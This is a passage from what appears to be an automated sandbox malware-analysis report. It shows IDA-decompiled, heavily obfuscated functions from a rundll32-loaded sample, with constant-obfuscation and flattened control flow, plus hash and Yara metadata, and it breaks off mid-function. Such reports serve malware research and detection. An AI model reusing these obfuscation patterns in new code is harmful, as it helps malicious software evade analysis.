                                                                                                                          • Instruction Fuzzy Hash: 47916471D01219EBDF54CFE9D88AADEBBB1FF44314F20810AE216BA290D7B41A45CF95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00796D24 Relevance: 2.7, Strings: 2, Instructions: 164COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E00796D24() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				short* _t158;
				void* _t161;
				void* _t164;
				intOrPtr _t173;
				intOrPtr _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t198;

				_v556 = 0x5b9523;
				_v556 = _v556 ^ 0xd644881d;
				_t164 = 0xafec1cc;
				_v556 = _v556 ^ 0xd61fc18a;
				_v560 = 0xf0211a;
				_v560 = _v560 >> 0xc;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x000d86e8;
				_v536 = 0x5b86ee;
				_t192 = 0x7a;
				_v536 = _v536 / _t192;
				_v536 = _v536 ^ 0x00051f37;
				_v528 = 0x15dba1;
				_v528 = _v528 + 0xffff3226;
				_v528 = _v528 ^ 0x001c60e6;
				_v564 = 0xcdfacc;
				_v564 = _v564 ^ 0x78a7d3e3;
				_v564 = _v564 << 0xe;
				_v564 = _v564 ^ 0x8a48a6fd;
				_v572 = 0x7eccf1;
				_v572 = _v572 + 0xffffd1bc;
				_t193 = 0x2e;
				_v572 = _v572 * 0x26;
				_v572 = _v572 ^ 0x12c53124;
				_v588 = 0x8dc921;
				_v588 = _v588 | 0x53df5653;
				_v588 = _v588 << 7;
				_v588 = _v588 * 0x73;
				_v588 = _v588 ^ 0xc8beb34e;
				_v544 = 0xe1fa74;
				_v544 = _v544 + 0xffffe6ac;
				_v544 = _v544 ^ 0x00e0f2b8;
				_v568 = 0x925246;
				_v568 = _v568 + 0xffffcd65;
				_v568 = _v568 + 0xffffdee0;
				_v568 = _v568 ^ 0x009eae97;
				_v576 = 0x3c09b4;
				_v576 = _v576 + 0xffff2c4c;
				_v576 = _v576 >> 0xa;
				_v576 = _v576 ^ 0x000cc2c3;
				_v592 = 0xac7846;
				_v592 = _v592 ^ 0xbb2572b9;
				_v592 = _v592 ^ 0xeb3265e6;
				_v592 = _v592 | 0x6a541c4b;
				_v592 = _v592 ^ 0x7af30806;
				_v548 = 0xb1a24a;
				_v548 = _v548 / _t193;
				_v548 = _v548 ^ 0x00094ccb;
				_v552 = 0xbe5b93;
				_v552 = _v552 | 0xe01e3375;
				_v552 = _v552 ^ 0xe0b0d42a;
				_v532 = 0x76dce5;
				_t194 = 0x19;
				_v532 = _v532 / _t194;
				_v532 = _v532 ^ 0x00002403;
				_v584 = 0xffb3b0;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x8b2427a7;
				_v584 = _v584 | 0x0ff5fda2;
				_v584 = _v584 ^ 0x7ffdbf2b;
				_v580 = 0x6f9ecd;
				_t195 = 0x5b;
				_v580 = _v580 / _t195;
				_v580 = _v580 << 0xc;
				_v580 = _v580 ^ 0x13a22276;
				_v540 = 0xd8d341;
				_v540 = _v540 * 0xb;
				_v540 = _v540 ^ 0x095c7847;
				do {
					while(_t164 != 0x2dc4ff7) {
						if(_t164 == 0x5cfc1e4) {
							return E00799DCF(_v532, _v584, _v580,  &_v524,  &_v524, E00794EE3, _v540, 0);
						}
						if(_t164 == 0x9efe9dd) {
							_push(_v536);
							_push(_v560);
							_t161 = E007ADCF7(_v556, 0x791000, __eflags);
							_t173 =  *0x7b3e10; // 0x0
							_t188 =  *0x7b3e10; // 0x0
							E007947CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
							_t158 = E0079A8B0(_v568, _t161, _v576);
							_t198 = _t198 + 0x24;
							_t164 = 0x2dc4ff7;
							continue;
						}
						if(_t164 != 0xafec1cc) {
							goto L8;
						}
						_t164 = 0x9efe9dd;
					}
					_t158 = E0079B6CF( &_v524, _v592, _v548, _v552);
					__eflags = 0;
					 *_t158 = 0;
					_t164 = 0x5cfc1e4;
					L8:
					__eflags = _t164 - 0xdc02af8;
				} while (__eflags != 0);
				return _t158;
			}































                                                                                                                          0x00796d2a
                                                                                                                          0x00796d34
                                                                                                                          0x00796d3c
                                                                                                                          0x00796d41
                                                                                                                          0x00796d49
                                                                                                                          0x00796d51
                                                                                                                          0x00796d56
                                                                                                                          0x00796d5b
                                                                                                                          0x00796d63
                                                                                                                          0x00796d75
                                                                                                                          0x00796d7a
                                                                                                                          0x00796d80
                                                                                                                          0x00796d88
                                                                                                                          0x00796d90
                                                                                                                          0x00796d98
                                                                                                                          0x00796da0
                                                                                                                          0x00796da8
                                                                                                                          0x00796db0
                                                                                                                          0x00796db5
                                                                                                                          0x00796dbd
                                                                                                                          0x00796dc5
                                                                                                                          0x00796dd2
                                                                                                                          0x00796dd5
                                                                                                                          0x00796dd9
                                                                                                                          0x00796de1
                                                                                                                          0x00796de9
                                                                                                                          0x00796df1
                                                                                                                          0x00796dfb
                                                                                                                          0x00796dff
                                                                                                                          0x00796e07
                                                                                                                          0x00796e0f
                                                                                                                          0x00796e17
                                                                                                                          0x00796e1f
                                                                                                                          0x00796e27
                                                                                                                          0x00796e2f
                                                                                                                          0x00796e37
                                                                                                                          0x00796e3f
                                                                                                                          0x00796e47
                                                                                                                          0x00796e4f
                                                                                                                          0x00796e54
                                                                                                                          0x00796e5c
                                                                                                                          0x00796e64
                                                                                                                          0x00796e6c
                                                                                                                          0x00796e74
                                                                                                                          0x00796e7c
                                                                                                                          0x00796e84
                                                                                                                          0x00796e94
                                                                                                                          0x00796e98
                                                                                                                          0x00796ea0
                                                                                                                          0x00796ea8
                                                                                                                          0x00796eb0
                                                                                                                          0x00796eb8
                                                                                                                          0x00796ec4
                                                                                                                          0x00796ec7
                                                                                                                          0x00796ecb
                                                                                                                          0x00796ed3
                                                                                                                          0x00796edb
                                                                                                                          0x00796ee0
                                                                                                                          0x00796ee8
                                                                                                                          0x00796ef0
                                                                                                                          0x00796efa
                                                                                                                          0x00796f08
                                                                                                                          0x00796f15
                                                                                                                          0x00796f1e
                                                                                                                          0x00796f23
                                                                                                                          0x00796f2b
                                                                                                                          0x00796f38
                                                                                                                          0x00796f3c
                                                                                                                          0x00796f44
                                                                                                                          0x00796f44
                                                                                                                          0x00796f4e
                                                                                                                          0x00000000
                                                                                                                          0x0079701e
                                                                                                                          0x00796f56
                                                                                                                          0x00796f68
                                                                                                                          0x00796f71
                                                                                                                          0x00796f79
                                                                                                                          0x00796f8a
                                                                                                                          0x00796fa2
                                                                                                                          0x00796fb2
                                                                                                                          0x00796fc1
                                                                                                                          0x00796fc6
                                                                                                                          0x00796fc9
                                                                                                                          0x00000000
                                                                                                                          0x00796fc9
                                                                                                                          0x00796f5e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00796f64
                                                                                                                          0x00796f64
                                                                                                                          0x00796fe0
                                                                                                                          0x00796fe7
                                                                                                                          0x00796fe9
                                                                                                                          0x00796fec
                                                                                                                          0x00796fee
                                                                                                                          0x00796fee
                                                                                                                          0x00796fee
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Gx\$e2
                                                                                                                          • API String ID: 0-3912940318
                                                                                                                          • Opcode ID: fad71234ba848c76644af7a031ae0480de8865fb2cb11a46247f7762c8d83af8
                                                                                                                          • Instruction ID: 1b2798eba3e7225449ad30290375f0f12343ee81787ddd3e334543ad565782fb
                                                                                                                          • Opcode Fuzzy Hash: fad71234ba848c76644af7a031ae0480de8865fb2cb11a46247f7762c8d83af8
                                                                                                                          • Instruction Fuzzy Hash: D97153711083419FC768CF25E88A81FBBF2FBC4758F105A1DF29696260D3B59949CF86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079A55F Relevance: 2.7, Strings: 2, Instructions: 159COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0079A55F() {
				char _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _t161;
				char* _t162;
				intOrPtr _t164;
				void* _t168;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				short* _t195;
				signed int* _t197;

				_t197 =  &_v584;
				_v528 = _v528 & 0x00000000;
				_v524 = _v524 & 0x00000000;
				_t168 = 0xe71c2f1;
				_v532 = 0xa0346f;
				_v560 = 0x45ed96;
				_t187 = 0x29;
				_v560 = _v560 / _t187;
				_t189 = 0x5d;
				_v560 = _v560 * 0x5e;
				_v560 = _v560 ^ 0x00ac5e2c;
				_v568 = 0x587b3f;
				_v568 = _v568 >> 1;
				_v568 = _v568 >> 6;
				_v568 = _v568 + 0x3200;
				_v568 = _v568 ^ 0x000d20ef;
				_v540 = 0x1767bf;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00010300;
				_v548 = 0xad8e3d;
				_v548 = _v548 ^ 0x5762e507;
				_v548 = _v548 ^ 0xbd28358e;
				_v548 = _v548 ^ 0xeae8e106;
				_v584 = 0xa1a61c;
				_v584 = _v584 * 0x38;
				_v584 = _v584 + 0xffff1963;
				_v584 = _v584 | 0xaacebf86;
				_v584 = _v584 ^ 0xabd4b38c;
				_v556 = 0xa4c35b;
				_v556 = _v556 / _t189;
				_v556 = _v556 | 0xf6aeb391;
				_v556 = _v556 ^ 0xf6ac7ee7;
				_v536 = 0xf31b8a;
				_v536 = _v536 | 0x87603e20;
				_v536 = _v536 ^ 0x87f7aca9;
				_v576 = 0x423791;
				_v576 = _v576 + 0xffffb580;
				_v576 = _v576 + 0x7a73;
				_v576 = _v576 ^ 0x7a6e2c80;
				_v576 = _v576 ^ 0x7a24ad4c;
				_v544 = 0x7ccdad;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x3e66d3ae;
				_v572 = 0x1eeccc;
				_v572 = _v572 | 0x2c9b1d75;
				_v572 = _v572 << 6;
				_t190 = 0x5b;
				_v572 = _v572 / _t190;
				_v572 = _v572 ^ 0x007e2283;
				_v552 = 0x119b6d;
				_t191 = 0x5a;
				_v552 = _v552 / _t191;
				_v552 = _v552 ^ 0xceecc8a8;
				_v552 = _v552 ^ 0xceebe4d8;
				_v580 = 0x5ef79f;
				_v580 = _v580 / _t187;
				_v580 = _v580 | 0x8cf80c97;
				_t192 = 0x3d;
				_v580 = _v580 / _t192;
				_v580 = _v580 ^ 0x02499ffb;
				do {
					while(_t168 != 0xc65bb2) {
						if(_t168 == 0x63f282e) {
							_t162 = E007ADA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
							_t197 =  &(_t197[4]);
							_t168 = 0xc65bb2;
							continue;
						}
						if(_t168 == 0xb3c9692) {
							_t164 =  *0x7b3e10; // 0x0
							__eflags = _t164 + 0x1c;
							return E00793BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
						}
						if(_t168 != 0xe71c2f1) {
							goto L15;
						}
						_t168 = 0x63f282e;
					}
					_v564 = 0x8b8c25;
					_v564 = _v564 * 0x78;
					_v564 = _v564 + 0xffff9cfb;
					_v564 = _v564 ^ 0x41694e51;
					_t161 = E0079CB52(_v584,  &_v520, _v556, _v536, _v576);
					_t197 =  &(_t197[3]);
					_t195 =  &_v520 + _t161 * 2;
					while(1) {
						_t162 =  &_v520;
						__eflags = _t195 - _t162;
						if(_t195 <= _t162) {
							break;
						}
						__eflags =  *_t195 - 0x5c;
						if( *_t195 != 0x5c) {
							L10:
							_t195 = _t195 - 2;
							__eflags = _t195;
							continue;
						}
						_t139 =  &_v564;
						 *_t139 = _v564 - 1;
						__eflags =  *_t139;
						if( *_t139 == 0) {
							__eflags = _t195;
							L14:
							_t168 = 0xb3c9692;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t168 - 0x6143c47;
				} while (__eflags != 0);
				return _t162;
			}































                                                                                                                          0x0079a55f
                                                                                                                          0x0079a565
                                                                                                                          0x0079a56c
                                                                                                                          0x0079a571
                                                                                                                          0x0079a576
                                                                                                                          0x0079a57e
                                                                                                                          0x0079a590
                                                                                                                          0x0079a595
                                                                                                                          0x0079a5a0
                                                                                                                          0x0079a5a3
                                                                                                                          0x0079a5a7
                                                                                                                          0x0079a5af
                                                                                                                          0x0079a5b7
                                                                                                                          0x0079a5bb
                                                                                                                          0x0079a5c0
                                                                                                                          0x0079a5c8
                                                                                                                          0x0079a5d0
                                                                                                                          0x0079a5d8
                                                                                                                          0x0079a5dd
                                                                                                                          0x0079a5e5
                                                                                                                          0x0079a5ed
                                                                                                                          0x0079a5f5
                                                                                                                          0x0079a5fd
                                                                                                                          0x0079a605
                                                                                                                          0x0079a612
                                                                                                                          0x0079a616
                                                                                                                          0x0079a61e
                                                                                                                          0x0079a626
                                                                                                                          0x0079a62e
                                                                                                                          0x0079a63e
                                                                                                                          0x0079a642
                                                                                                                          0x0079a64a
                                                                                                                          0x0079a652
                                                                                                                          0x0079a65a
                                                                                                                          0x0079a662
                                                                                                                          0x0079a66a
                                                                                                                          0x0079a672
                                                                                                                          0x0079a67a
                                                                                                                          0x0079a682
                                                                                                                          0x0079a68a
                                                                                                                          0x0079a692
                                                                                                                          0x0079a69a
                                                                                                                          0x0079a69f
                                                                                                                          0x0079a6a7
                                                                                                                          0x0079a6af
                                                                                                                          0x0079a6b7
                                                                                                                          0x0079a6c0
                                                                                                                          0x0079a6c5
                                                                                                                          0x0079a6c9
                                                                                                                          0x0079a6d1
                                                                                                                          0x0079a6df
                                                                                                                          0x0079a6e4
                                                                                                                          0x0079a6e8
                                                                                                                          0x0079a6f0
                                                                                                                          0x0079a6f8
                                                                                                                          0x0079a706
                                                                                                                          0x0079a70a
                                                                                                                          0x0079a71a
                                                                                                                          0x0079a726
                                                                                                                          0x0079a72f
                                                                                                                          0x0079a73c
                                                                                                                          0x0079a73c
                                                                                                                          0x0079a742
                                                                                                                          0x0079a772
                                                                                                                          0x0079a777
                                                                                                                          0x0079a77a
                                                                                                                          0x00000000
                                                                                                                          0x0079a77a
                                                                                                                          0x0079a746
                                                                                                                          0x0079a7f0
                                                                                                                          0x0079a7f5
                                                                                                                          0x00000000
                                                                                                                          0x0079a80f
                                                                                                                          0x0079a752
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a758
                                                                                                                          0x0079a758
                                                                                                                          0x0079a77e
                                                                                                                          0x0079a78f
                                                                                                                          0x0079a793
                                                                                                                          0x0079a79b
                                                                                                                          0x0079a7b3
                                                                                                                          0x0079a7bc
                                                                                                                          0x0079a7bf
                                                                                                                          0x0079a7d3
                                                                                                                          0x0079a7d3
                                                                                                                          0x0079a7d7
                                                                                                                          0x0079a7d9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079a7c4
                                                                                                                          0x0079a7c8
                                                                                                                          0x0079a7d0
                                                                                                                          0x0079a7d0
                                                                                                                          0x0079a7d0
                                                                                                                          0x00000000
                                                                                                                          0x0079a7d0
                                                                                                                          0x0079a7ca
                                                                                                                          0x0079a7ca
                                                                                                                          0x0079a7ca
                                                                                                                          0x0079a7ce
                                                                                                                          0x0079a7dd
                                                                                                                          0x0079a7e0
                                                                                                                          0x0079a7e0
                                                                                                                          0x00000000
                                                                                                                          0x0079a7e0
                                                                                                                          0x00000000
                                                                                                                          0x0079a7ce
                                                                                                                          0x00000000
                                                                                                                          0x0079a7e2
                                                                                                                          0x0079a7e2
                                                                                                                          0x0079a7e2
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: QNiA$sz
                                                                                                                          • API String ID: 0-294658094
                                                                                                                          • Opcode ID: 44bc72fface78f27bab437d3b22ee19de25a57c4856c079e41b23d08bdcb59df
                                                                                                                          • Instruction ID: 5cfcded05e9ec341f0e991c97a8f7fb1e763608089d1fc3a4cbd4c614a846dde
                                                                                                                          • Opcode Fuzzy Hash: 44bc72fface78f27bab437d3b22ee19de25a57c4856c079e41b23d08bdcb59df
                                                                                                                          • Instruction Fuzzy Hash: 5371637150A341ABC798CF66E98681FBBF1FBC4718F50491DF586A6260D378CA098F87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A0B19 Relevance: 2.6, Strings: 2, Instructions: 144COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E007A0B19(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				void* _t160;
				void* _t164;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				intOrPtr _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int* _t194;

				_t194 =  &_v68;
				_v12 = 0xec215;
				_v8 = 0x867af3;
				_t190 =  *0x7b3208; // 0x0
				_v4 = 0;
				_t164 = __ecx;
				_v64 = 0x2d9572;
				_t191 = _t190 + 0x20c;
				_v64 = _v64 + 0xffff7051;
				_v64 = _v64 ^ 0xb4c09ebb;
				_v64 = _v64 | 0x08f8e0e6;
				_v64 = _v64 ^ 0xbcfdfbfe;
				_v40 = 0xaf9231;
				_v40 = _v40 + 0x3789;
				_v40 = _v40 + 0x1acf;
				_v40 = _v40 ^ 0x00adbfc0;
				_v68 = 0xf5f340;
				_v68 = _v68 ^ 0x3b0075db;
				_v68 = _v68 >> 1;
				_v68 = _v68 + 0xaae2;
				_v68 = _v68 ^ 0x1dff90e5;
				_v24 = 0xe1803e;
				_v24 = _v24 + 0x946c;
				_v24 = _v24 ^ 0x00ebebe2;
				_v44 = 0xcb8087;
				_t166 = 0x7f;
				_v44 = _v44 / _t166;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00394faa;
				_v32 = 0x6e7c9c;
				_v32 = _v32 << 0xf;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00f599ec;
				_v36 = 0x8d7ece;
				_v36 = _v36 + 0xd96f;
				_v36 = _v36 + 0x3e8b;
				_v36 = _v36 ^ 0x008d6b01;
				_v60 = 0x740a18;
				_v60 = _v60 + 0x5af6;
				_t167 = 0x2d;
				_v60 = _v60 / _t167;
				_t168 = 0xc;
				_v60 = _v60 / _t168;
				_v60 = _v60 ^ 0x000f4a79;
				_v48 = 0xecd979;
				_v48 = _v48 + 0xffff2496;
				_t169 = 3;
				_v48 = _v48 / _t169;
				_v48 = _v48 ^ 0xbc9c03a4;
				_v48 = _v48 ^ 0xbcdb2390;
				_v52 = 0x17ff93;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0x3109;
				_v52 = _v52 ^ 0x7590f195;
				_v52 = _v52 ^ 0x8a641707;
				_v20 = 0x28811b;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x05ddec85;
				_v56 = 0x23ad29;
				_t170 = 0x5a;
				_v56 = _v56 / _t170;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x06fabbcf;
				_v56 = _v56 ^ 0x06fdb2ad;
				_v28 = 0x8d9789;
				_v28 = _v28 | 0x3813f7c3;
				_v28 = _v28 + 0xa24c;
				_v28 = _v28 ^ 0x38ab2d0e;
				_v16 = 0x83a12;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x41de3db0;
				while(1) {
					_t192 =  *_t191;
					if(_t192 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
						L4:
						 *_t191 =  *_t192;
						_t160 = E007A8519(_v28, _v16, _t192);
					} else {
						_t133 =  &_v40; // 0xebebe2
						_t160 = E00798DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
						_t194 =  &(_t194[4]);
						if(_t160 != _v64) {
							_t191 = _t192;
						} else {
							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
							E007A9E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
							E007A1E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
							_t194 =  &(_t194[5]);
							goto L4;
						}
					}
				}
				return _t160;
			}
































                                                                                                                          0x007a0b19
                                                                                                                          0x007a0b1c
                                                                                                                          0x007a0b26
                                                                                                                          0x007a0b32
                                                                                                                          0x007a0b3a
                                                                                                                          0x007a0b3e
                                                                                                                          0x007a0b40
                                                                                                                          0x007a0b48
                                                                                                                          0x007a0b4e
                                                                                                                          0x007a0b56
                                                                                                                          0x007a0b5e
                                                                                                                          0x007a0b66
                                                                                                                          0x007a0b6e
                                                                                                                          0x007a0b76
                                                                                                                          0x007a0b7e
                                                                                                                          0x007a0b86
                                                                                                                          0x007a0b8e
                                                                                                                          0x007a0b96
                                                                                                                          0x007a0b9e
                                                                                                                          0x007a0ba2
                                                                                                                          0x007a0baa
                                                                                                                          0x007a0bb2
                                                                                                                          0x007a0bba
                                                                                                                          0x007a0bc2
                                                                                                                          0x007a0bca
                                                                                                                          0x007a0bd8
                                                                                                                          0x007a0bdd
                                                                                                                          0x007a0be3
                                                                                                                          0x007a0be8
                                                                                                                          0x007a0bf0
                                                                                                                          0x007a0bf8
                                                                                                                          0x007a0bfd
                                                                                                                          0x007a0c02
                                                                                                                          0x007a0c0a
                                                                                                                          0x007a0c12
                                                                                                                          0x007a0c1a
                                                                                                                          0x007a0c22
                                                                                                                          0x007a0c2a
                                                                                                                          0x007a0c32
                                                                                                                          0x007a0c3e
                                                                                                                          0x007a0c43
                                                                                                                          0x007a0c4d
                                                                                                                          0x007a0c52
                                                                                                                          0x007a0c58
                                                                                                                          0x007a0c60
                                                                                                                          0x007a0c68
                                                                                                                          0x007a0c74
                                                                                                                          0x007a0c77
                                                                                                                          0x007a0c7b
                                                                                                                          0x007a0c83
                                                                                                                          0x007a0c8b
                                                                                                                          0x007a0c93
                                                                                                                          0x007a0c98
                                                                                                                          0x007a0ca0
                                                                                                                          0x007a0ca8
                                                                                                                          0x007a0cb0
                                                                                                                          0x007a0cbd
                                                                                                                          0x007a0cc1
                                                                                                                          0x007a0cc9
                                                                                                                          0x007a0cd9
                                                                                                                          0x007a0cdc
                                                                                                                          0x007a0ce0
                                                                                                                          0x007a0ce5
                                                                                                                          0x007a0ced
                                                                                                                          0x007a0cf5
                                                                                                                          0x007a0cfd
                                                                                                                          0x007a0d05
                                                                                                                          0x007a0d0d
                                                                                                                          0x007a0d15
                                                                                                                          0x007a0d1d
                                                                                                                          0x007a0d22
                                                                                                                          0x007a0d9d
                                                                                                                          0x007a0d9d
                                                                                                                          0x007a0da1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a0d2f
                                                                                                                          0x007a0d8a
                                                                                                                          0x007a0d95
                                                                                                                          0x007a0d97
                                                                                                                          0x007a0d31
                                                                                                                          0x007a0d41
                                                                                                                          0x007a0d45
                                                                                                                          0x007a0d4a
                                                                                                                          0x007a0d51
                                                                                                                          0x007a0dab
                                                                                                                          0x007a0d53
                                                                                                                          0x007a0d58
                                                                                                                          0x007a0d6a
                                                                                                                          0x007a0d82
                                                                                                                          0x007a0d87
                                                                                                                          0x00000000
                                                                                                                          0x007a0d87
                                                                                                                          0x007a0d51
                                                                                                                          0x007a0d2f
                                                                                                                          0x007a0daa

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 1$
                                                                                                                          • API String ID: 0-209397207
                                                                                                                          • Opcode ID: 74907930e7babf867565bd15afd802ff20072529cb06d32755247b4b07085135
                                                                                                                          • Instruction ID: af0adff6816321dc50a937da39f485cba37bc03a98b0e1e4806d26c530cab64f
                                                                                                                          • Opcode Fuzzy Hash: 74907930e7babf867565bd15afd802ff20072529cb06d32755247b4b07085135
                                                                                                                          • Instruction Fuzzy Hash: 60612FB25083419FC394CF21D48940BBBF1FBC9768F509A1DF19696260D7B5DA4A8F83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079AEFB Relevance: 2.6, Strings: 2, Instructions: 141COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E0079AEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t116;
				void* _t130;
				intOrPtr _t133;
				void* _t137;
				intOrPtr* _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				void* _t162;

				_t135 = _a12;
				_push(_a16);
				_t154 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t116);
				_v44 = 0xe8605f;
				_t162 = _t161 + 0x18;
				_v44 = _v44 + 0x84a0;
				_v44 = _v44 ^ 0x00e8e4ff;
				_t155 = 0;
				_v68 = 0xe00e28;
				_t137 = 0xc99b7e9;
				_v68 = _v68 << 9;
				_v68 = _v68 << 2;
				_t156 = 0x3b;
				_v68 = _v68 / _t156;
				_v68 = _v68 ^ 0x0001eb63;
				_v76 = 0x5a4023;
				_v76 = _v76 >> 0xf;
				_t157 = 0x5b;
				_v76 = _v76 * 0x13;
				_v76 = _v76 ^ 0x64c481b8;
				_v76 = _v76 ^ 0x64ccd277;
				_v64 = 0xe36df4;
				_v64 = _v64 / _t157;
				_t158 = 9;
				_v64 = _v64 * 0x52;
				_v64 = _v64 ^ 0x00c8b522;
				_v80 = 0x952e3b;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0xc023484e;
				_v80 = _v80 / _t158;
				_v80 = _v80 ^ 0x155df6ec;
				_v72 = 0x4bfcfc;
				_v72 = _v72 | 0x0a339af0;
				_v72 = _v72 << 0xf;
				_t159 = 0x12;
				_v72 = _v72 / _t159;
				_v72 = _v72 ^ 0x0e3e5ce5;
				_v40 = 0xc0630c;
				_v40 = _v40 | 0x5d0d844d;
				_v40 = _v40 ^ 0x5dc4e99c;
				_v52 = 0x98b7b;
				_v52 = _v52 + 0xa105;
				_v52 = _v52 >> 5;
				_v52 = _v52 ^ 0x0004c78d;
				_v56 = 0xd0814a;
				_v56 = _v56 >> 9;
				_v56 = _v56 * 0x3e;
				_v56 = _v56 ^ 0x001a31dc;
				_v60 = 0xb9e1cb;
				_v60 = _v60 * 0x25;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x768204a8;
				_v48 = 0xccd34a;
				_v48 = _v48 + 0xffff20ce;
				_v48 = _v48 ^ 0x00ce4dff;
				do {
					while(_t137 != 0x8f26e2d) {
						if(_t137 == 0xc99b7e9) {
							_t137 = 0x8f26e2d;
							continue;
						} else {
							if(_t137 != 0xfe1ef29) {
								goto L10;
							} else {
								_t133 =  *0x7b3dfc; // 0x0
